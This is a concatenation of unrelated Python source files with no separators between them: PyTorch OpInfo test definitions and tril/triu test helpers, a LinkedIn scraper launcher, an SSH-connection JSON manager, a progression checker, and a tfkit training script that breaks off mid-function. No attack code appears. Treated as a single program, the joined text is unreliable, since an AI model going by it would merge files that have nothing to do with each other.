torch_opinfo_name="special.i1", ), ElementwiseUnaryPythonRefInfo( "_refs.special.i1e", torch_opinfo_name="special.i1e", ), ElementwiseUnaryPythonRefInfo( "_refs.special.logit", torch_opinfo_name="logit", ), # # Elementwise Unary nn.functional OpInfos # ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.celu", torch_opinfo_name="nn.functional.celu", ), PythonRefInfo( "_refs.nn.functional.dropout", torch_opinfo_name="nn.functional.dropout", decorators=( DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: dropout is not comparable"), 'TestMathBits', 'test_neg_view'), ) ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.elu", torch_opinfo_name="nn.functional.elu", ), PythonRefInfo( "_refs.nn.functional.leaky_relu", torch_opinfo_name="nn.functional.leaky_relu", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.relu", torch_opinfo_name="nn.functional.relu", decorators=( # Need FakeTensor support for meta coverage DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_meta',), ), ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.mish", torch_opinfo_name="nn.functional.mish", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.selu", torch_opinfo_name="nn.functional.selu", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.softplus", torch_opinfo_name="nn.functional.softplus", ), PythonRefInfo( 
"_refs.nn.functional.margin_ranking_loss", torch_opinfo_name="nn.functional.margin_ranking_loss", ), PythonRefInfo( "_refs.nn.functional.hinge_embedding_loss", torch_opinfo_name="nn.functional.hinge_embedding_loss", ), ElementwiseUnaryPythonRefInfo( "_refs.nn.functional.tanhshrink", torch_opinfo_name="nn.functional.tanhshrink", ), # # Elementwise Binary Reference OpInfos # ElementwiseBinaryPythonRefInfo( "_refs.add", torch_opinfo_name="add", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.atan2", torch_opinfo_name="atan2", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_and", torch_opinfo_name="bitwise_and", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_left_shift", torch_opinfo_name="bitwise_left_shift", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_or", torch_opinfo_name="bitwise_or", ), ElementwiseBinaryPythonRefInfo( "_refs.bitwise_xor", torch_opinfo_name="bitwise_xor", ), ElementwiseBinaryPythonRefInfo( "_refs.eq", torch_opinfo_name="eq", ), ElementwiseBinaryPythonRefInfo( "_refs.float_power", torch_opinfo_name="float_power", skips=( # Test doesn't account for float -> double type promotion DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), ) ), ElementwiseBinaryPythonRefInfo( "_refs.fmax", torch_opinfo_name="fmax", supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.fmin", torch_opinfo_name="fmin", supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.fmod", torch_opinfo_name="fmod", rhs_make_tensor_kwargs={'exclude_zero': True}, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_python_ref', dtypes=(torch.bfloat16,), device_type='cpu'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_python_ref_torch_fallback', dtypes=(torch.bfloat16,), device_type='cpu'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.ge", torch_opinfo_name="ge", ), ElementwiseBinaryPythonRefInfo( "_refs.gt", torch_opinfo_name="gt", ), ElementwiseBinaryPythonRefInfo( "_refs.igamma", torch_opinfo_name="igamma", ), ElementwiseBinaryPythonRefInfo( "_refs.igammac", torch_opinfo_name="igammac", ), ElementwiseBinaryPythonRefInfo( "_refs.isclose", torch_opinfo_name="isclose", skips=( # Intentional xfail -- isclose does not type promote DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.le", torch_opinfo_name="le", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_and", torch_opinfo_name="logical_and", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_or", torch_opinfo_name="logical_or", ), ElementwiseBinaryPythonRefInfo( "_refs.logical_xor", torch_opinfo_name="logical_xor", ), ElementwiseBinaryPythonRefInfo( "_refs.lt", torch_opinfo_name="lt", ), ElementwiseBinaryPythonRefInfo( "_refs.maximum", torch_opinfo_name="maximum", skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.minimum", torch_opinfo_name="minimum", skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref_errors'), ), ), ElementwiseBinaryPythonRefInfo( "_refs.mul", torch_opinfo_name="mul", # 
https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.ne", torch_opinfo_name="ne", ), ElementwiseBinaryPythonRefInfo( "_refs.nextafter", torch_opinfo_name="nextafter", ), ElementwiseBinaryPythonRefInfo( "_refs.pow", torch_opinfo_name="pow", ), ElementwiseBinaryPythonRefInfo( "_refs.sub", torch_opinfo_name="sub", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), ElementwiseBinaryPythonRefInfo( "_refs.true_divide", torch_opinfo_name="true_divide", # https://github.com/pytorch/pytorch/issues/76944 supports_two_python_scalars=False, supports_one_python_scalar=True, ), # # Elementwise Binary Special OpInfos # ElementwiseBinaryPythonRefInfo( "_refs.special.zeta", torch_opinfo_name="special.zeta", supports_one_python_scalar=True, ), # # Elementwise Ternary Reference OpInfos # PythonRefInfo( "_refs.clamp", torch_opinfo_name="clamp", ), # # Data Conversion & Data Movement Opinfos # PythonRefInfo( "_refs.clone", torch_opinfo_name="clone", ), # # View & Shape OpInfos # PythonRefInfo( "_refs.atleast_1d", torch_opinfo_name="atleast_1d", ), PythonRefInfo( "_refs.atleast_2d", torch_opinfo_name="atleast_2d", ), PythonRefInfo( "_refs.atleast_3d", torch_opinfo_name="atleast_3d", ), PythonRefInfo( "_refs.as_strided", torch_opinfo_name="as_strided", # FIXME: doesn't support chalf dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( # TODO: fix and/or update to xfails DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_python_ref_meta'), # cloned_mutable_input.is_same(returned_output) INTERNAL ASSERT FAILED DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_conj_view'), ), ), PythonRefInfo( "_refs.broadcast_shapes", torch_opinfo_name="broadcast_shapes", ), PythonRefInfo( "_refs.broadcast_tensors", torch_opinfo_name="broadcast_tensors", ), PythonRefInfo( "_refs.broadcast_to", torch_opinfo_name="broadcast_to", ), PythonRefInfo( "_refs.cat", torch_opinfo_name="cat", ), PythonRefInfo( "_refs.chunk", torch_opinfo_name="chunk", ), PythonRefInfo( "_refs.column_stack", torch_opinfo_name="column_stack", ), PythonRefInfo( "_refs.dsplit", torch_opinfo_name="dsplit", ), PythonRefInfo( "_refs.dstack", torch_opinfo_name="dstack", ), PythonRefInfo( "_refs.flatten", torch_opinfo_name="flatten", ), PythonRefInfo( "_refs.flip", torch_opinfo_name="flip", ), PythonRefInfo( "_refs.fliplr", torch_opinfo_name="fliplr", ), PythonRefInfo( "_refs.flipud", torch_opinfo_name="flipud", ), PythonRefInfo( "_refs.narrow", torch_opinfo_name="narrow", ), PythonRefInfo( "_refs.permute", torch_opinfo_name="permute", ), PythonRefInfo( "_refs.reshape", torch_opinfo_name="reshape", ), PythonRefInfo( "_refs.roll", torch_opinfo_name="roll", validate_view_consistency=False, ), PythonRefInfo( "_refs.rot90", torch_opinfo_name="rot90", validate_view_consistency=False, ), PythonRefInfo( "_refs.stack", torch_opinfo_name="stack", ), PythonRefInfo( "_refs.squeeze", torch_opinfo_name="squeeze", ), PythonRefInfo( "_refs.tensor_split", torch_opinfo_name="tensor_split", skips=( # TensorMeta doesn't support tolist DecorateInfo(unittest.expectedFailure, 'TestCommon', 
'test_python_ref_meta'), # RuntimeError: no _refs support for torch.Tensor.tolist DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref'), ) ), PythonRefInfo( "_refs.transpose", torch_opinfo_name="transpose", ), PythonRefInfo( "_refs.t", torch_opinfo_name="t", ), PythonRefInfo( "_refs.unsqueeze", torch_opinfo_name="unsqueeze", ), PythonRefInfo( "_refs.view", torch_opinfo_name="view", ), # # Reduction Reference OpInfos # ReductionPythonRefInfo( "_refs.all", torch_opinfo_name="all", ), ReductionPythonRefInfo( "_refs.amax", torch_opinfo_name="amax", ), ReductionPythonRefInfo( "_refs.amin", torch_opinfo_name="amin", ), ReductionPythonRefInfo( "_refs.any", torch_opinfo_name="any", ), ReductionPythonRefInfo( "_refs.mean", torch_opinfo_name="mean", supports_out=True, ), ReductionPythonRefInfo( "_refs.std", torch_opinfo_name="std", supports_out=True ), # std_mean and var_mean are not ReductionInfos PythonRefInfo( "_refs.std_mean", torch_opinfo_name="std_mean", validate_view_consistency=False ), ReductionPythonRefInfo( "_refs.sum", torch_opinfo_name="sum", supports_out=True, ), ReductionPythonRefInfo( "_refs.prod", torch_opinfo_name="prod", supports_out=True, ), ReductionPythonRefInfo( "_refs.var", torch_opinfo_name="var", supports_out=True ), PythonRefInfo( "_refs.var_mean", torch_opinfo_name="var_mean", validate_view_consistency=False ), # # Linear Algebra Operators # PythonRefInfo( "_refs.addr", torch_opinfo_name="addr", decorators=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_python_ref',), ), ), # # Tensor Creation Reference OpInfos # PythonRefInfo( "_refs.empty", torch_opinfo_name="empty", skips=( DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_view'), ), ), PythonRefInfo( "_refs.empty_like", torch_opinfo_name="empty_like", skips=( DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_python_ref_torch_fallback'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_conj_view'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestMathBits', 'test_neg_view'), ), ), # # Conditional Reference OpInfos # PythonRefInfo( "_refs.where", torch_opinfo_name="where", op=lambda self, condition, other: refs.where(condition, self, other), ), ] # Common operator groupings ops_and_refs = op_db + python_ref_db unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo)] binary_ufuncs = [op for op in op_db if isinstance(op, BinaryUfuncInfo)] binary_ufuncs_and_refs 
= tuple(op for op in ops_and_refs if isinstance(op, BinaryUfuncInfo)) spectral_funcs = [op for op in op_db if isinstance(op, SpectralFuncInfo)] sparse_unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo) and op.supports_sparse] sparse_csr_unary_ufuncs = [op for op in op_db if isinstance(op, UnaryUfuncInfo) and op.supports_sparse_csr] sparse_reduction_ops = [op for op in op_db if isinstance(op, ReductionOpInfo) and op.supports_sparse] shape_funcs = [op for op in op_db if isinstance(op, ShapeFuncInfo)] reduction_ops = [op for op in op_db if isinstance(op, ReductionOpInfo)] reference_filtered_ops = [op for op in reduction_ops if op.ref not in (_NOTHING, None)] reference_masked_ops = [op for op in reference_filtered_ops if op.name.startswith('_masked.')] sparse_masked_reduction_ops = [op for op in sparse_reduction_ops if op.name.startswith('_masked.')] # TODO: review porting these to make_tensor def index_variable(shape, max_indices, device=torch.device('cpu')): if not isinstance(shape, tuple): shape = (shape,) index = torch.rand(*shape, dtype=torch.double, device=device).mul_(max_indices).floor_().long() return index def gather_variable(shape, index_dim, max_indices, duplicate=False, device=torch.device('cpu')): assert len(shape) == 2 assert index_dim < 2 batch_dim = 1 - index_dim index = torch.zeros(*shape, dtype=torch.long, device=device) for i in range(shape[index_dim]): index.select(index_dim, i).copy_( torch.randperm(max_indices, device=device)[:shape[batch_dim]]) if duplicate: index.select(batch_dim, 0).copy_(index.select(batch_dim, 1)) return index def bernoulli_scalar(): return torch.tensor(0, dtype=torch.bool).bernoulli_() def mask_not_all_zeros(shape): assert len(shape) > 0 while True: result = torch.randn(shape).gt(0) if result.sum() > 0: return result # TODO: move all tri/tril/triu testing to tensor creation op test suite and remove # these from here def _compare_trilu_indices( self, row, col, offset=0, dtype=torch.long, device='cpu'): if row == 0 or col == 0: # have to handle this separately as tril and triu does not take # empty matrix as input self.assertEqual( torch.empty(0, 2, dtype=dtype, device=device).transpose(0, 1), torch.tril_indices(row, col, offset, dtype=dtype, device=device)) self.assertEqual( torch.empty(0, 2, dtype=dtype, device=device).transpose(0, 1), torch.triu_indices(row, col, offset, dtype=dtype, device=device)) else: # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095 self.assertEqualIgnoreType( torch.ones(row, col, device='cpu') .tril(offset).nonzero().to(dtype).transpose(0, 1), torch.tril_indices(row, col, offset, dtype=dtype, device=device)) # TODO(#38095): Replace assertEqualIgnoreType. 
See issue #38095 self.assertEqualIgnoreType( torch.ones(row, col, device='cpu') .triu(offset).nonzero().to(dtype).transpose(0, 1), torch.triu_indices(row, col, offset, dtype=dtype, device=device)) def _compare_large_trilu_indices( self, row, col, offset=0, dtype=torch.long, device='cpu'): l = torch.ones(row, col, dtype=dtype, device='cpu').tril(offset) \ .nonzero()[-100:-1, :].transpose(0, 1).to(device) torch.cuda.empty_cache() r = torch.tril_indices( row, col, offset, dtype=dtype, device=device)[:, -100:-1] self.assertEqual(l, r) torch.cuda.empty_cache() l = torch.ones(row, col, dtype=dtype, device='cpu').triu(offset) \ .nonzero()[-100:-1, :].transpose(0, 1).to(device) torch.cuda.empty_cache() r = torch.triu_indices( row, col, offset, dtype=dtype, device=device)[:, -100:-1] self.assertEqual(l, r) torch.cuda.empty_cache() # ( # row # col # offset (optional) # dtype (optional) # ) tri_tests_args = [ (1, 1), (3, 3), (3, 3, 1), (3, 3, 2), (3, 3, 200), (3, 3, -1), (3, 3, -2), (3, 3, -200), (0, 3, 0), (0, 3, 1), (0, 3, -1), (0, 1, 2), (1, 0, 2), (3, 0, 0), (3, 0, 1), (3, 0, -1), (0, 0, 0), (0, 0, 1), (0, 0, -1), (3, 6, 0), (3, 6, 1), (3, 6, 3), (3, 6, 9), (3, 6, -1), (3, 6, -3), (3, 6, -9), (6, 3, 0), (6, 3, 1), (6, 3, 3), (6, 3, 9), (6, 3, -1), (6, 3, -3), (6, 3, -9), (258, 253, 1, torch.float32), (257, 258, 1, torch.float64), (258, 258, 1, torch.short), (3, 513, 1, torch.long), (513, 3, 1, torch.int), (513, 0, 1, torch.double), (1024, 1024), (1024, 1024, 500, torch.float32), (1024, 1024, 1023), (1024, 1024, -500), (1023, 1025), (1025, 1023, 1022), (1024, 1024, -500), (3, 2028), (3, 2028, 1), (3, 2028, -1), (2028, 3), (2028, 1), (2028, 1, -1) ] tri_large_tests_args: List[Tuple[int, ...]] = [ # Large test cases below are deliberately commented out to speed up CI # tests and to avoid OOM error. When modifying implementations of # tril_indices and triu_indices, please enable these tests and make sure # they pass. # # (1, 268435455), # (5000, 5000), # (10000, 10000), # (268435455, 1), # (134217727, 2, 1), # (2, 134217727, 1), # (536870901, 1), # (1, 536870901), # (268435455, 2, 1), # (2, 268435455, 1) ] def run_additional_tri_tests(self, device): x = torch.ones( 3, 3, dtype=torch.long, device=device, layout=torch.strided) l = x.tril(0).nonzero().transpose(0, 1) u = x.triu(0).nonzero().transpose(0, 1) self.assertEqual(l, torch.tril_indices(3, 3, device=device)) self.assertEqual( l, torch.tril_indices(3, 3, device=device, layout=torch.strided)) self.assertEqual(u, torch.triu_indices(3, 3, device=device)) self.assertEqual( u, torch.triu_indices(3, 3, device=device, layout=torch.strided)) self.assertRaises( RuntimeError, lambda: torch.triu_indices( 1, 1, device=device, layout=torch.sparse_coo)) self.assertRaises( RuntimeError, lambda: torch.tril_indices( 1, 1, device=device, layout=torch.sparse_coo))
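# ---------------------------------------------------------------------------
# Illustrative sketch (an addition, not part of the original helpers): the
# tuples in tri_tests_args above follow the (row, col[, offset[, dtype]])
# convention documented in the comment block, so they can be unpacked and fed
# straight to torch.tril_indices / torch.triu_indices. The function name is
# hypothetical; real consumers live in the test files that import this module.
def _demo_consume_tri_tests_args(device='cpu'):
    for args in tri_tests_args:
        row, col = args[0], args[1]
        offset = args[2] if len(args) > 2 else 0
        dtype = args[3] if len(args) > 3 else torch.long
        # Both calls return a (2, N) tensor of coordinates for the lower /
        # upper triangle at the given diagonal offset.
        lower = torch.tril_indices(row, col, offset, dtype=dtype, device=device)
        upper = torch.triu_indices(row, col, offset, dtype=dtype, device=device)
        assert lower.shape[0] == 2 and upper.shape[0] == 2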
#!/usr/bin/env python3

from argparse import ArgumentParser
from os import path
import sys
import time

try:
    sys.path.insert(0, path.abspath(path.join(path.dirname(__file__), "..")))
    from scraper import __version__
    from scraper import main
except ModuleNotFoundError as e:
    print(f"[x] {e}")
    sys.exit(1)

if __name__ == "__main__":
    parser = ArgumentParser(description="Business scraper on LinkedIn")
    # required expects a bool; the original passed the string "True", which
    # only worked by accident of truthiness
    parser.add_argument("-u", "--url", type=str, help="Set URL", required=True)
    parser.add_argument(
        "-d", "--driver", type=str, help="Set path to chromedriver", required=True
    )
    parser.add_argument(
        "-o",
        "--output",
        type=str,
        help="Set output file name",
        default=f"{time.strftime('%d%m%y-%H%M%S')}.csv",
    )
    parser.add_argument(
        "-v", "--version", action="version", version="%(prog)s " + __version__
    )
    args = parser.parse_args()
    main.Init(args)
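# Example invocation (illustrative; the script path and chromedriver location
# are assumptions, not taken from this repository):
#   python3 bin/scraper.py -u "https://www.linkedin.com/company/example" \
#       -d /usr/local/bin/chromedriver -o results.csv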
import json

from ssh_keyword_tools import checkQuit
from ssh_keyword_json import ManageJson
from ssh_keyword_newconnection import CreateConnection


class Connection(object):
    'Manage connections'

    def __init__(self, ip='0'):
        self.ip = ip
        self.fJson = ManageJson()

    def setConnection(self):
        if not self.isExist(self.ip):
            newConnection = CreateConnection()
            print('Entry for new connection')
            print("Enter 'Quit' for exit")
            print()
            self.user = newConnection.qUser()
            self.port = newConnection.qPort()
            self.keywords = newConnection.qKeywords()
            self.default = newConnection.qDefault()
            datajson = self.toJson()
            self.reloadDatas()
            self.fJson.data.append(json.loads(datajson))
            self.toFile()
        else:
            print('Connection already exists, you can edit it')

    def getConnection(self, value, dictKey):
        'Get connection from json'
        if self.fJson.search(value, dictKey):
            return self.fJson.search(value, dictKey)
        return None

    def isExist(self, ip):
        if self.fJson.search(ip, 'ip'):
            return True
        return False

    def remove(self):
        'Remove a connection from json'
        if self.isExist(self.ip):
            connection = self.getConnection(self.ip, 'ip')
            self.fJson.data.remove(connection)
            self.toFile()
        else:
            print("Connection not found")

    def update(self, connection, dictKey, value):
        'Update one field (dictKey) of a connection with a new value'
        indexConnection = self.fJson.data.index(connection)
        self.fJson.data[indexConnection].update({dictKey: value})
        self.toFile()

    def edit(self):
        'Edit a connection from json'
        if self.isExist(self.ip):
            connection = self.getConnection(self.ip, 'ip')
            while True:
                ip, user = connection.get('ip'), connection.get('user')
                port, keywords = connection.get('port'), connection.get('keywords')
                default = connection.get('default')
                print(f'Edit connection {self.ip}')
                print(f"ip:{ip} user:{user} port:{port} keywords:{keywords} default:{default}")
                print('')
                enter = input("What do you want to edit ([Q]uit for exit): ")
                checkQuit(enter)
                if enter.lower() in ['ip', 'user', 'port', 'keywords', 'default']:
                    editCo = CreateConnection()
                    if enter.lower() == 'ip':
                        ip = editCo.qIp()
                        if not self.isExist(ip):
                            self.update(connection, 'ip', ip)
                            self.ip = ip
                            print('Ip edited')
                        else:
                            print('Ip already exists')
                    elif enter.lower() == 'user':
                        self.update(connection, 'user', editCo.qUser())
                        print('User edited')
                    # the original compared the raw input here, so 'Port' was
                    # never matched; lower it like the other branches
                    elif enter.lower() == 'port':
                        self.update(connection, 'port', editCo.qPort())
                        print('Port edited')
                    elif enter.lower() == 'keywords':
                        self.update(connection, 'keywords', editCo.qKeywords())
                        print('Keywords edited')
                    elif enter.lower() == 'default':
                        self.update(connection, 'default', editCo.qDefault())
                        print('Server default edited')
                connection = self.getConnection(self.ip, 'ip')
                print('')
        else:
            print("Connection not found")

    def addDefault(self):
        'Add a default connection'
        if self.isExist(self.ip):
            connection = self.getConnection(self.ip, 'ip')
            if self.getConnection(True, 'default'):
                previousConnection = self.getConnection(True, 'default')
                print(f"Previous connection '{previousConnection.get('ip')}' default is now set to False")
                self.update(previousConnection, 'default', False)
            self.update(connection, 'default', True)
            self.toFile()
        else:
            print("Connection not found")

    def toJson(self):
        # drop the non-serialisable ManageJson handle so only the connection
        # fields end up in the dump
        del self.fJson
        return json.dumps(self, default=lambda o: o.__dict__, sort_keys=True, indent=4)

    def toFile(self):
        self.fJson.saveToJson()
        self.reloadDatas()

    def reloadDatas(self):
        'Reload json file'
        self.fJson = ManageJson()
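# Minimal usage sketch for the Connection manager above. All prompts come from
# CreateConnection, so this only outlines the call order:
#   conn = Connection(ip='192.168.1.10')
#   conn.setConnection()   # create the entry if the IP is unknown
#   conn.addDefault()      # mark it as the default connection
#   conn.edit()            # interactive field-by-field edit loop
#   conn.remove()          # delete the entry again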
#!/usr/bin/env python3

###########################################################################
#                                                                         #
#   Program purpose: Determines if a list of integers is an Arithmetic   #
#                    or Geometric progression.                           #
#   Program Author : Happi Yvan <ivensteinpoker@gmail.com>                #
#   Creation Date  : September 9, 2019                                    #
#                                                                         #
###########################################################################


def ap_gp_sequence(data=None):
    if data is None:
        data = []
    if data[0] == data[1] == data[2] == 0:
        return {"data": data, "error": "Wrong numbers"}
    if data[1] - data[0] == data[2] - data[1]:
        # arithmetic: common difference d, so next term = c + d = 2c - b
        temp = 2 * data[2] - data[1]
        return {"data": data, "seq": "AP", "next": str(temp)}
    if data[0] != 0 and data[1] != 0 and data[2] / data[1] == data[1] / data[0]:
        # geometric: common ratio r, so next term = c * r = c**2 / b
        # (the original declared any non-AP input a GP without this check)
        temp = data[2] ** 2 / data[1]
        return {"data": data, "seq": "GP", "next": str(temp)}
    return {"data": data, "error": "Neither AP nor GP"}


def print_info(info=None):
    # report against the sequence actually tested (carried in info["data"]);
    # the original printed the module-level seq_a for every call
    if "error" in info.keys():
        print(f"{info['data']} is not AP or GP")
    else:
        print(f"{info['data']} is {info['seq']} and next value is {info['next']}")


if __name__ == "__main__":
    seq_a = [1, 2, 3]
    seq_b = [2, 6, 18]
    seq_c = [0, 0, 0]
    print_info(ap_gp_sequence(data=seq_a))
    print_info(ap_gp_sequence(data=seq_b))
    print_info(ap_gp_sequence(data=seq_c))
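# Worked examples of the progression rules above:
#   [1, 2, 3]  -> 2 - 1 == 3 - 2, so AP; next term = 2*3 - 2 = 4
#   [2, 6, 18] -> 6/2 == 18/6 == 3, so GP; next term = 18**2 / 6 = 54.0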
import argparse
import sys
import os
from datetime import timedelta
import time
from itertools import zip_longest

import torch
from torch.utils import data
from tqdm.auto import tqdm
from transformers import get_linear_schedule_with_warmup

import nlp2
import tfkit
import tfkit.utility.tok as tok
from tfkit.utility.dataset import get_dataset, dataloader_collate
from tfkit.utility.logger import Logger
from tfkit.utility.model import load_model_class, save_model, load_pretrained_tokenizer, load_pretrained_model

import logging

from accelerate import Accelerator

transformers_logger = logging.getLogger('transformers')
transformers_logger.setLevel(logging.CRITICAL)
os.environ["TOKENIZERS_PARALLELISM"] = "false"
os.environ["OMP_NUM_THREADS"] = "1"


def parse_train_args(args):
    parser = argparse.ArgumentParser()
    exceed_mode = nlp2.function_get_all_arg_with_value(tok.handle_exceed)['mode']
    parser.add_argument("--batch", type=int, default=20, help="batch size, default 20")
    parser.add_argument("--lr", type=float, nargs='+', default=[5e-5], help="learning rate, default 5e-5")
    parser.add_argument("--epoch", type=int, default=10, help="epoch, default 10")
    parser.add_argument("--maxlen", type=int, default=0, help="max tokenized sequence length, default model max len")
    parser.add_argument("--handle_exceed", choices=exceed_mode,
                        help='select how to handle inputs that exceed max length')
    parser.add_argument("--savedir", type=str, default="checkpoints/", help="model saving dir, default checkpoints/")
    parser.add_argument("--add_tokens_freq", type=int, default=0, help="auto add freq >= x UNK token to word table")
    parser.add_argument("--add_tokens_file", type=str, help="add token from a list file")
    parser.add_argument("--train", type=str, nargs='+', required=True, help="train dataset path")
    parser.add_argument("--test", type=str, nargs='+', required=True, help="test dataset path")
    parser.add_argument("--no_eval", action='store_true', help="do not run evaluation")
    parser.add_argument("--model", type=str, required=True, nargs='+',
                        choices=tfkit.utility.model.list_all_model(), help="model task")
    parser.add_argument("--tag", type=str, nargs='+', help="tag to identify task in multi-task")
    parser.add_argument("--config", type=str, default='bert-base-multilingual-cased', required=True,
                        help='distilbert-base-multilingual-cased|voidful/albert_chinese_small')
    parser.add_argument("--seed", type=int, default=609, help="random seed, default 609")
    parser.add_argument("--worker", type=int, default=8, help="number of workers for pre-processing, default 8")
    parser.add_argument("--grad_accum", type=int, default=1, help="gradient accumulation, default 1")
    parser.add_argument('--tensorboard', action='store_true', help='Turn on tensorboard graphing')
    parser.add_argument('--wandb', action='store_true', help='Turn on wandb with project name')
    parser.add_argument("--resume", help='resume training')
    parser.add_argument("--cache", action='store_true', help='cache training data')
    parser.add_argument("--panel", action='store_true', help="enable panel to input arguments")

    input_arg, model_arg = parser.parse_known_args(args)
    input_arg = {k: v for k, v in vars(input_arg).items() if v is not None}
    model_arg = {k.replace("--", ""): v for k, v in zip(model_arg[:-1:2], model_arg[1::2])}

    return input_arg, model_arg


def optimizer(model, lr, total_step):
    optim = torch.optim.AdamW(model.parameters(), lr=lr)
    scheduler = get_linear_schedule_with_warmup(optim, num_warmup_steps=int(total_step * 0.05),
                                                num_training_steps=total_step)
    return [optim, scheduler]


def model_train(models_list, dataloaders, models_tag, input_arg, epoch, logger, accelerator):
    optims_schs = []
    models = []
    total_iter = 0
    t_loss = 0
    end = False
    total_iter_length = len(dataloaders[0])
    pbar = tqdm(total=total_iter_length)
    data_iters = []
    for i, (model, dataloader) in enumerate(zip(models_list, dataloaders)):
        if not accelerator.state.backend:
            model = torch.nn.DataParallel(model)
        model.train()
        optim = optimizer(model,
                          input_arg.get('lr')[i] if i < len(input_arg.get('lr')) else input_arg.get('lr')[0],
                          total_iter_length)
        model, optim, dataloader = accelerator.prepare(model, optim, dataloader)
        optims_schs.append(optim)
        models.append(model)
        data_iters.append(iter(dataloader))

    while not end:
        for (model, optim_sch, mtag, train_batch) in zip(models, optims_schs, models_tag, data_iters):
            optim = optim_sch[0]
            scheduler = optim_sch[1]
            train_batch = next(train_batch, None)
            if train_batch is not None:
                loss = model(train_batch)
                loss = loss / input_arg.get('grad_accum')
                accelerator.backward(loss.mean())
                if (total_iter + 1) % input_arg.get('grad_accum') == 0:
                    optim.step()
                    model.zero_grad()
                    scheduler.step()
                t_loss += loss.mean().detach()
                logger.write_metric("loss/step", loss.mean().detach(), epoch)
                if total_iter % 100 == 0 and total_iter != 0:  # monitoring
                    logger.write_log(
                        f"epoch: {epoch}, tag: {mtag}, model: {model.__class__.__name__}, step: {total_iter}, loss: {t_loss / total_iter if total_iter > 0 else 0}, total: {total_iter_length}")
            else:
                end = True
        pbar.update(1)
        total_iter += 1
    pbar.close()
    logger.write_log(
        f"epoch: {epoch}, step: {total_iter}, loss: {t_loss / total_iter if total_iter > 0 else 0}, total: {total_iter}")
    return t_loss / total_iter


def model_eval(models, dataloaders, fname, input_arg, epoch, logger, accelerator):
    t_loss = 0
    t_length = 0
    for m in models:
        m.eval()

    with torch.no_grad():
        total_iter_length = len(dataloaders[0])
        iters = [iter(accelerator.prepare(ds)) for ds in dataloaders]
        end = False
        pbar = tqdm(total=total_iter_length)
        while not end:
